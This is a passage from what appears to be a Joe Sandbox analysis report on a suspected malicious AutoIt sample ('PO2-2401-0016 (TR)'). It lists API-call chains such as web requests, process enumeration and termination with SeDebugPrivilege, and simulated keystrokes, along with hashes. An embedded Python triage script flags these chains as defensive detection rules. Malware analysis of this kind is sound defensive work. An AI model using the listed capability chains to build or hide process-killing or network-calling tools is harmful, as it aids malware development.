                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                • String ID: close all
                                • API String ID: 469580280-3243417748
                                • Opcode ID: f076bd34471dfd9eddebe0f8763b29e9ce8937d56044eb25967623fbfd39a413
                                • Instruction ID: 82f84ae62a18c6b537ae1d07f9b465c31bb818a333fab6c1dc3d7db47daa79d0
                                • Opcode Fuzzy Hash: f076bd34471dfd9eddebe0f8763b29e9ce8937d56044eb25967623fbfd39a413
                                • Instruction Fuzzy Hash: B5D1BD31701212EFDB2AEF14D899B69F7A0BF15301F1541ADE85A6B252DB30EC16CF90
                                APIs
                                • SetWindowLongW.USER32(?,000000EB), ref: 00155C7A
                                  • Part of subcall function 00155D0A: GetClientRect.USER32(?,?), ref: 00155D30
                                  • Part of subcall function 00155D0A: GetWindowRect.USER32(?,?), ref: 00155D71
                                  • Part of subcall function 00155D0A: ScreenToClient.USER32(?,?), ref: 00155D99
                                • GetDC.USER32 ref: 001946F5
                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00194708
                                • SelectObject.GDI32(00000000,00000000), ref: 00194716
                                • SelectObject.GDI32(00000000,00000000), ref: 0019472B
                                • ReleaseDC.USER32(?,00000000), ref: 00194733
                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001947C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                • String ID: U
                                • API String ID: 4009187628-3372436214
                                • Opcode ID: 4709d1af2c0a1db88f00c5d80f646fae261bed71f98ea2bc973abc356df29a41
                                • Instruction ID: 6498488b2e8d0f5ba0a78d6018628a6710811319da89850cd1f0c2fb30ad8ad8
                                • Opcode Fuzzy Hash: 4709d1af2c0a1db88f00c5d80f646fae261bed71f98ea2bc973abc356df29a41
                                • Instruction Fuzzy Hash: 4971E035400209DFCF29CFA4CD84EBA3BB6FF5A365F144269ED655A266C3319882DF60
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001C35E4
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • LoadStringW.USER32(00222390,?,00000FFF,?), ref: 001C360A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LoadString$_wcslen
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 4099089115-2391861430
                                • Opcode ID: 5848e1d7f0a4e9ba788192df135102af560b64218cd4552cf6efb1a462d740c2
                                • Instruction ID: 7853ff7d389bcda5a24bc83ca19cb1c897d87b501431a0cb87e1abdaa31dc9a3
                                • Opcode Fuzzy Hash: 5848e1d7f0a4e9ba788192df135102af560b64218cd4552cf6efb1a462d740c2
                                • Instruction Fuzzy Hash: 04518F72800209FACF14EBE0DC46EEEBB75AF24341F144169F525760A1EB315B99DFA1
                                APIs
                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001CC272
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001CC29A
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001CC2CA
                                • GetLastError.KERNEL32 ref: 001CC322
                                • SetEvent.KERNEL32(?), ref: 001CC336
                                • InternetCloseHandle.WININET(00000000), ref: 001CC341
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                • String ID:
                                • API String ID: 3113390036-3916222277
                                • Opcode ID: a299f9cefe0df17a29c746ef53ee6a913507f031fa5333c2c3f3b005b0f1d451
                                • Instruction ID: f663a7b71e98c8daa85890c1a540bafe6b9a7abfa7ca6c5661b1e4a7fbc249f9
                                • Opcode Fuzzy Hash: a299f9cefe0df17a29c746ef53ee6a913507f031fa5333c2c3f3b005b0f1d451
                                • Instruction Fuzzy Hash: 80319AB1A00248AFD7219FA49C88FAF7BFCFB69740B14851EF44A96601DB30DD458BE1
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00193AAF,?,?,Bad directive syntax error,001ECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001B98BC
                                • LoadStringW.USER32(00000000,?,00193AAF,?), ref: 001B98C3
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001B9987
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HandleLoadMessageModuleString_wcslen
                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                • API String ID: 858772685-4153970271
                                • Opcode ID: a7e18f179cff5b06543278216a804e5208ae76de2d69f84a5d381ad4e6c6c8fc
                                • Instruction ID: 4f2232bbc9713799403ba3055ec96d59f5f482d8336c8012b1ae1e8af6dc32bb
                                • Opcode Fuzzy Hash: a7e18f179cff5b06543278216a804e5208ae76de2d69f84a5d381ad4e6c6c8fc
                                • Instruction Fuzzy Hash: CA21B131C0021EEBCF15AF90CC0AEEE7775FF29305F044469F9256A0A2EB319668DB51
                                APIs
                                • GetParent.USER32 ref: 001B20AB
                                • GetClassNameW.USER32(00000000,?,00000100), ref: 001B20C0
                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001B214D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassMessageNameParentSend
                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                • API String ID: 1290815626-3381328864
                                • Opcode ID: 9794a5faadf5d0027b5845e033ed6e04e597a550aa79247c64fcb5bc973b4163
                                • Instruction ID: 5c76f2a68032a52c293b56e7d136ac733978ade2fbf1b443d5b427bb16202958
                                • Opcode Fuzzy Hash: 9794a5faadf5d0027b5845e033ed6e04e597a550aa79247c64fcb5bc973b4163
                                • Instruction Fuzzy Hash: 1A1159B668C316FAF6052224DC07CEB33ECCB25328B204056FB09E50D6FF7568965A54
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 166d44584bb2a3a6ae2c315804138d004fc902f27391e7d01e07fc3301890a7c
                                • Instruction ID: 59b25734382bd75dfe965338c452cb5e218d0faaa72605c97b3ccbbd90172988
                                • Opcode Fuzzy Hash: 166d44584bb2a3a6ae2c315804138d004fc902f27391e7d01e07fc3301890a7c
                                • Instruction Fuzzy Hash: 56C1D474904249AFDB21EFE8D845BBDBBB4AF19310F184199F518A7392CB349A42CF61
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                • String ID:
                                • API String ID: 1282221369-0
                                • Opcode ID: 3c98c0c01e8ab96126cf09d17c0149d01e21dcfcbe47278aada8a34afc7f2f91
                                • Instruction ID: eb05ad79db7cda97b2499ddfc2d2978f60a8ebdad785d0a0874c8060534e4d5e
                                • Opcode Fuzzy Hash: 3c98c0c01e8ab96126cf09d17c0149d01e21dcfcbe47278aada8a34afc7f2f91
                                • Instruction Fuzzy Hash: 3A616971904311AFEF32BFB4A885A6A7BA5EF11310F15416EFA4497282D7319F028FE0
                                APIs
                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001A6890
                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001A68A9
                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001A68B9
                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001A68D1
                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001A68F2
                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00168874,00000000,00000000,00000000,000000FF,00000000), ref: 001A6901
                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001A691E
                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00168874,00000000,00000000,00000000,000000FF,00000000), ref: 001A692D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                • String ID:
                                • API String ID: 1268354404-0
                                • Opcode ID: b809d38f7904bdd02e0fd44cc2a41862e0ffb10893d197b789fa7a246a38eeea
                                • Instruction ID: 23563d28ac4f9157639af88e1291395521a0c3b3e5e40ad5a8840b47bc7470ee
                                • Opcode Fuzzy Hash: b809d38f7904bdd02e0fd44cc2a41862e0ffb10893d197b789fa7a246a38eeea
                                • Instruction Fuzzy Hash: 0F5178B4600309EFDB24CF64CC95FAA7BB5FB58750F144618F9129B2A0DB70E9A1DB50
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001CC182
                                • GetLastError.KERNEL32 ref: 001CC195
                                • SetEvent.KERNEL32(?), ref: 001CC1A9
                                  • Part of subcall function 001CC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001CC272
                                  • Part of subcall function 001CC253: GetLastError.KERNEL32 ref: 001CC322
                                  • Part of subcall function 001CC253: SetEvent.KERNEL32(?), ref: 001CC336
                                  • Part of subcall function 001CC253: InternetCloseHandle.WININET(00000000), ref: 001CC341
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                • String ID:
                                • API String ID: 337547030-0
                                • Opcode ID: d8deb1957c58f06fecd4321a1dbf19ffd959cb8d525f61751e650bf6b2231cdc
                                • Instruction ID: 25cae97be8119d56c23748b4a9aa0add55b2472566ab07a1cd5b4c9dbfc4242b
                                • Opcode Fuzzy Hash: d8deb1957c58f06fecd4321a1dbf19ffd959cb8d525f61751e650bf6b2231cdc
                                • Instruction Fuzzy Hash: BC317A71600645AFDB219FE5DC44F6ABBF9FF28300B04441DF95A86A10D730EC559BE0
                                APIs
                                  • Part of subcall function 001B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B3A57
                                  • Part of subcall function 001B3A3D: GetCurrentThreadId.KERNEL32 ref: 001B3A5E
                                  • Part of subcall function 001B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001B25B3), ref: 001B3A65
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001B25BD
                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001B25DB
                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001B25DF
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001B25E9
                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001B2601
                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 001B2605
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001B260F
                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001B2623
                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 001B2627
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                • String ID:
                                • API String ID: 2014098862-0
                                • Opcode ID: c65987e5c2d811c1baad515b5560ecf26abb241ecc88b76545e4857b9323a341
                                • Instruction ID: b43eff342e9c73de3b9872ca5f6e660d22253134738b3947eeb015e9637f06dc
                                • Opcode Fuzzy Hash: c65987e5c2d811c1baad515b5560ecf26abb241ecc88b76545e4857b9323a341
                                • Instruction Fuzzy Hash: BA01D830390250BBFB1067A99CCAFD93F59DB5EB12F100011F314AF1D1CAF114858AA9
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001B1449,?,?,00000000), ref: 001B180C
                                • HeapAlloc.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B1813
                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001B1449,?,?,00000000), ref: 001B1828
                                • GetCurrentProcess.KERNEL32(?,00000000,?,001B1449,?,?,00000000), ref: 001B1830
                                • DuplicateHandle.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B1833
                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001B1449,?,?,00000000), ref: 001B1843
                                • GetCurrentProcess.KERNEL32(001B1449,00000000,?,001B1449,?,?,00000000), ref: 001B184B
                                • DuplicateHandle.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B184E
                                • CreateThread.KERNEL32(00000000,00000000,001B1874,00000000,00000000,00000000), ref: 001B1868
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                • String ID:
                                • API String ID: 1957940570-0
                                • Opcode ID: 77764c59e3e4698007a99c9d2c179cb6a73aba88014122f389d4bd1131be896f
                                • Instruction ID: 5aaefe370039c895dcac839bfbf80743a51b81909f3c5b68d74561d24ab566c4
                                • Opcode Fuzzy Hash: 77764c59e3e4698007a99c9d2c179cb6a73aba88014122f389d4bd1131be896f
                                • Instruction Fuzzy Hash: D301BBB5240348FFE710ABA5DC8DF6B3BACEB89B11F414411FA05DF5A1CA709841CB60
                                APIs
                                  • Part of subcall function 001BD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001BD501
                                  • Part of subcall function 001BD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 001BD50F
                                  • Part of subcall function 001BD4DC: CloseHandle.KERNEL32(00000000), ref: 001BD5DC
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001DA16D
                                • GetLastError.KERNEL32 ref: 001DA180
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001DA1B3
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 001DA268
                                • GetLastError.KERNEL32(00000000), ref: 001DA273
                                • CloseHandle.KERNEL32(00000000), ref: 001DA2C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                • String ID: SeDebugPrivilege
                                • API String ID: 2533919879-2896544425
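The two function blocks above (the GetProcessHeap/DuplicateHandle/CreateThread block, and the OpenProcess/TerminateProcess block whose only string is SeDebugPrivilege) are the API-chain summaries an analyst greps through when triaging a report. The Python script below is an added example, not Joe Sandbox tooling and not code from the sample: it parses such blocks, decodes the first OpenProcess argument (00000001 is PROCESS_TERMINATE, consistent with the TerminateProcess call that follows) and flags API combinations using an assumed rule set. SAMPLE is constructed from the two blocks above. One caveat a practitioner should keep in mind: in a compiled AutoIt binary (the AUTOIT.ERROR string further down belongs to the interpreter) these chains are the AutoIt runtime's own process-handling routines, so a hit shows capability available to the embedded script, not proof that the payload exercised it.

```python
"""Triage helper for the per-function 'APIs' / 'Similarity' blocks of a
Joe Sandbox report (added example; not Joe Sandbox tooling).

Parses the blocks, decodes the OpenProcess access mask and flags API
combinations that deserve a closer look. SAMPLE is constructed from two
function blocks of the report; the rule set is an assumption."""
import re

# One API line looks like either of these:
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001DA16D
#   • Part of subcall function 001BD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001BD501
_API_RE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Subset of the PROCESS_* access rights passed as OpenProcess's first argument.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION",
}

# Assumed triage rules: (label, APIs that must all appear, required string or None).
RULES = [
    ("process-kill-with-debug-privilege", {"OpenProcess", "TerminateProcess"}, "SeDebugPrivilege"),
    ("process-enumeration", {"CreateToolhelp32Snapshot", "Process32FirstW"}, None),
    ("handle-dup-then-thread", {"DuplicateHandle", "CreateThread"}, None),
]

# Constructed from two function blocks of the report (subset of their lines).
SAMPLE = """\
• Opcode ID: c65987e5c2d811c1baad515b5560ecf26abb241ecc88b76545e4857b9323a341
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001B1449,?,?,00000000), ref: 001B180C
• HeapAlloc.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B1813
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001B1449,?,?,00000000), ref: 001B1828
• DuplicateHandle.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B1833
• CreateThread.KERNEL32(00000000,00000000,001B1874,00000000,00000000,00000000), ref: 001B1868
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 77764c59e3e4698007a99c9d2c179cb6a73aba88014122f389d4bd1131be896f
APIs
  • Part of subcall function 001BD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001BD501
  • Part of subcall function 001BD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 001BD50F
  • Part of subcall function 001BD4DC: CloseHandle.KERNEL32(00000000), ref: 001BD5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 001DA16D
• GetLastError.KERNEL32 ref: 001DA180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 001DA1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 001DA268
• CloseHandle.KERNEL32(00000000), ref: 001DA2C4
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
"""


def parse_blocks(text):
    """Split report text into function blocks, each starting at an Opcode ID line."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("• Opcode ID:"):
            cur = {"opcode_id": line.split(":", 1)[1].strip(), "apis": [],
                   "string_id": "", "api_string_id": ""}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = _API_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur["apis"].append({"name": m.group("name"), "module": m.group("module"),
                                "args": args, "ref": m.group("ref"),
                                "subcall": m.group("sub") is not None})
        elif line.startswith("• API String ID:"):
            cur["api_string_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            cur["string_id"] = line.split(":", 1)[1].strip()
    return blocks


def decode_access(hex_arg):
    """Decode an OpenProcess dwDesiredAccess value; '?' means the sandbox could not resolve it."""
    if hex_arg == "?":
        return None
    mask = int(hex_arg, 16)
    return sorted(name for bit, name in PROCESS_ACCESS.items() if mask & bit)


def openprocess_access(block):
    """Distinct decoded access masks across every OpenProcess call in a block."""
    seen = []
    for api in block["apis"]:
        if api["name"] == "OpenProcess" and api["args"]:
            rights = decode_access(api["args"][0])
            if rights not in seen:
                seen.append(rights)
    return seen


def flag_block(block):
    """Labels of every rule the block satisfies; subcall APIs count as present."""
    names = {a["name"] for a in block["apis"]}
    strings = set(block["string_id"].split("$")) if block["string_id"] else set()
    return [label for label, needed, s in RULES
            if needed <= names and (s is None or s in strings)]


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b["opcode_id"][:12], flag_block(b), openprocess_access(b))
```

The String ID field uses `$` as its separator (compare the `blank$info$question$stop$warning` entry further down), which is why the rule matcher splits on it; the API ID field is a similarly joined list and could be matched the same way if the per-call lines were unavailable.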
                                • Opcode ID: 1d85f2412a1624c35d63f182410d6e6fb2cad18fdb0bf258e654341f79e88175
                                • Instruction ID: ec99e688dc56277af0985ba8bf64f683c6444608c4532f39bcc007c735729e7f
                                • Opcode Fuzzy Hash: 1d85f2412a1624c35d63f182410d6e6fb2cad18fdb0bf258e654341f79e88175
                                • Instruction Fuzzy Hash: E6618C312042429FD714DF19C894F1ABBE1AF54318F58849DE8668FBA2C772ED49CBD2
                                APIs
                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001E3925
                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001E393A
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001E3954
                                • _wcslen.LIBCMT ref: 001E3999
